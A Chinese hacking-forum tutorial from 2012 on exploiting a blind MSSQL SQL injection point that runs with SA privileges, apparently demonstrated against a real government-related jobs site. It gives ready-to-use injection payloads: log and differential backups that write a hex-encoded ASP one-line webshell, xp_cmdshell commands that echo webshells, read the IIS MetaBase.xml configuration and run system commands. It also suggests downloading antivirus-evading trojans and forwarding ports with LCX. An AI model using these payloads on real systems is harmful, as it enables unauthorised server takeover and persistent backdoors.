找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2024|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
, G$ N& r9 H2 \2 ^; r/ w* B) n3 ]( n9 ]& A5 @3 h

5 k  n8 X3 R- Q) m  K% }- Y  s# d$ l                                                             欢迎高手访问指导,欢迎新手朋友交流学习。8 o: @3 O% Q* O- u, Y

- E0 C* B) J9 q, r5 D6 }                                                                 , _9 K1 `( ?/ B/ y$ N
                                                                 
! z! w; ^7 p3 E7 I& O) X                                                                  论坛: http://www.90team.net/3 m' q( f0 `  Q3 S& e( a/ J( |6 M

2 J2 s- l3 `% o6 u  r+ E/ V( v
4 |# g# D# r& t7 b$ E: |6 I) c1 A& S
  n) E" h4 P/ @4 {# A友情检测国家人才网2 m, Y; e1 o8 J4 p
! r( j, r0 B6 {- r0 C
) B8 X9 C1 m6 g
内容:MSSQL注入SA权限不显错模式下的入侵
! G4 v0 @0 ^" Y) ]1 t. u/ k, l, u; \; \
  \, ~+ F7 ]9 Z' a, O
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
' y9 M+ T- G9 H& o+ Q: W( [1 ?
8 h9 j; b& O& a我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。, ]4 ?/ x1 u% @; \3 ]8 V6 O1 R* M, y
( j; e$ Y9 z9 [$ \% r6 e
9 ^4 X2 G0 x4 J; I
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。2 J8 Y  f8 x+ L$ Y! n
) B! D3 ^: c- x  i
思路:
' v# N) Y8 k5 i. C& `! Y. V7 y4 H' S* k: t* B4 {5 j( `
首先:
9 f0 q( U0 V. c6 p& L
, L& |2 t2 A: v* X# |" k- D通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。# D/ R) Y. d. J1 J9 y
  x3 z& ^& `( _& d& v) a( [1 x
1.日志备份获得Webshell4 O5 S* N4 w6 Z  Z5 P6 i
, b+ {7 ^6 S/ T' h) w" C  g
2.数据库差异备份获得Webshell
3 w; o+ l5 w  d$ u0 K4 I: ~# V" T) X- W% Y; u" H' Q
4.直接下载免杀远控木马。
" t9 f) w2 U% C7 x& W9 A
9 V6 ]# n5 w7 O' M8 [! h5.直接下载LCX将服务器端口转发出来# ?( O* V+ |8 X' P5 C
1 _7 z& n# q5 x5 N8 K
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
( i. v2 h: M2 [; B* o
, o  E, ]5 Q  r' d9 i  i0 D! J* F& B  ?4 y4 p1 z' K/ w0 E. f

  x2 j+ q: `' M. h. i. U在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, : o4 V6 L+ r3 d; L2 Y

2 I8 q$ X' a" q  I3 u& H5 r- s我直接演示后面一个方法" S, k$ v4 J  l
3 b( _, B" B. W; g# [/ B6 S

' J4 O1 @. e( _分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ' w. L/ x! h- G4 r  t: u# I) f. m2 Y
/ U& L+ h0 R$ b# ?, p) I7 D/ r
; V. s. Z" |! `! l7 j
0 H: Q, g! Q1 l3 L9 v; p
; ^+ |' O$ ~) @+ T) ~) K
◆日志备份:* l3 P* B. k4 a0 H4 i+ m# g) j5 `
* r! s( ^8 p0 R

; K' y% D( k1 \, r5 j/ o8 L; e1. 进行初始备份
- e) v& `1 @: r; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
( q2 s( z0 Q" ^. y4 G6 W" V
+ e/ {0 G7 A) h; e' [8 d$ `! w& r4 x2. 插入数据. |: C2 _& \% ^6 h& d! }
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--% Q+ V2 @: t2 a+ y  B6 z2 [# e# o2 d

! ?, i2 H0 `5 u) S0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>* y1 a8 U3 Y% n- b6 j
  
4 L: {) |$ E6 e& `2 M3. 备份并获得文件,删除临时表
. S9 ?; C) x. w" k;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
  ~/ m* ]7 s) S3 E! c; y
7 w7 O7 \% D$ C+ d0 J' T+ `2 Y9 b1 \& v* l5 G% e4 E8 Q

" L& b9 O( ]: m. M6 n7 n◆数据库差异备份8 I3 T3 M+ Y3 `5 h" |! X# o6 u( L7 f
1 y8 j. @6 ?. m1 H/ w0 P
(1. 进行差异备份准备工作
& r2 m' }4 y' d5 H' B0 J! k
8 b7 R* L6 m  D2 c$ y  W;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--/ n3 h( J1 r7 U3 J( P

" {( P6 a( ^5 ^% j2 q) }上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
; b6 J% p+ v# O9 k
6 r3 C( g$ P6 u* t3 w& A6 L0 A* V6 w2 d8 o& M& f6 w" y
(2. 将数据写入到数据库5 q& R9 ]3 R; ~8 |6 Y8 @# u9 E' f  E
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- " ^& I- S* Y" }) r- p3 [3 C9 s
1 R& L6 \4 e$ Q, F! t. ?8 a
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ G. H' R4 w: ?% C+ E
7 j0 I' L8 U6 H* |3. 备份数据库并清理临时文件
/ V/ C8 A+ O8 J5 B; b: Z# J/ X0 l8 p* k; u  A3 s+ D# a
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
  d( x1 L3 h% e/ ]8 {1 ?
+ I' p# ]  i% J/ p+ I0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
( T$ X8 B3 A- U+ h
3 _* }* d7 F7 u+ r$ }
3 z5 ^7 u8 i" m. q  y4 U8 Y$ Y# W" }6 e4 t$ t3 z5 m* X
用^转义字符来写ASP(一句话木马)文件的方法:   * q  v5 j9 ^( x8 {2 ]  |8 N
7 y& ~" P9 u2 g. ?" ^
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
& h( ^1 ?3 D; j  `- H/ `/ m. f8 A! b- E  Q
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
. o" p) {5 ?; L% F) p# ^
. l0 |0 |% V% ^  T) W读取IIS配置信息获取web路径
. r6 O( C1 i" ]& o# E8 U
, j$ K8 }* A6 @4 i; U2 {3 C/ E  ?0 c     
! {, h7 E& k6 A# w+ j8 ~     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
3 D- r- \5 P* [) T, ?8 x
1 c1 J; m' V; v+ W- W执行命令- Z% w. U' X2 B) A6 i* l
     ! M: Y5 {/ E, t6 d6 V
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
; {" z6 n) t  B3 _! L- C' {& `+ Q: l

; ?- B6 N2 ^" v  {
9 |$ Z3 c+ i5 u% A' E8 L2 Q0 v) v8 ?  x4 h% f

, P, L: G% G7 g2 i% Q, D" d- O) G4 X8 f- h8 Q" K6 z6 G
$ F. C% @% U6 {$ P0 [

" U$ q' e% N& h0 g7 e: u9 g7 j7 U- ~6 O! u$ y" ^' u
. w5 D% ~$ u9 Q/ I% B8 R
3 P$ V9 j2 b: ]7 K: I9 D
/ l2 r; B7 k2 ]& p. l$ i0 @
% s1 ~* `( Z7 F: ^& ]

( S$ f/ g' u$ r/ r: O# ^# F7 `
, |2 ?/ }: i4 H% n& T! X2 G3 @( S+ `$ v
0 H# p6 q# R" c1 d
# G6 Z( x/ M# V- A1 S# P6 q

8 E7 \- b: o9 u
3 ]. q  e# g$ A! {6 w4 \
4 \- L3 S: r# ]# R4 V9 E  B
( f9 U; m2 E% C+ a# C" Q$ R, t/ r2 R6 K7 a" S

  c4 N; u% \8 \9 R& C- n5 a% n6 v; I3 ?# X# P( H

- [+ g. s) W6 L) L& T% n2 l. K- {
3 {1 C& \: V4 J! ?+ d' k+ x9 P% d8 p  _8 E' \! y# R2 q& g
2 |9 V" `7 }- r5 e/ P2 @
- j6 l( M% X: u  T) O
, r: U* _' y( h% K! }
! U% d' Y) M' L# J: r

: V% x2 \/ X. I# s$ ?5 x
+ l, e' O# f2 q7 O8 P% `8 _3 Q" E- F3 E/ [# e( A

5 R" y% R. K" p/ x# ~+ Y% J' m+ k3 a2 \9 s( ~' O7 l  B; l9 z
, k' p' F) N+ \. h7 q/ {. @# x" Y
5 w' X3 ?9 C& e" M
; F1 V5 Q; z  j( E$ a  [

( S9 V. w3 m) p( J, v/ W8 _" v' V2 ]) I8 C. l( v1 l: E  ?2 T! x" \, J
& c! h# ^; s1 l' Y: O; s
. L7 U7 q, O& e+ ]0 `
: _5 K( k9 `/ r6 Z7 n8 s( p
( M; t0 X7 f) z4 l% s) G5 g3 x
+ L: ~8 J' Y! p: p# o
+ V3 U2 K3 k& a" n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表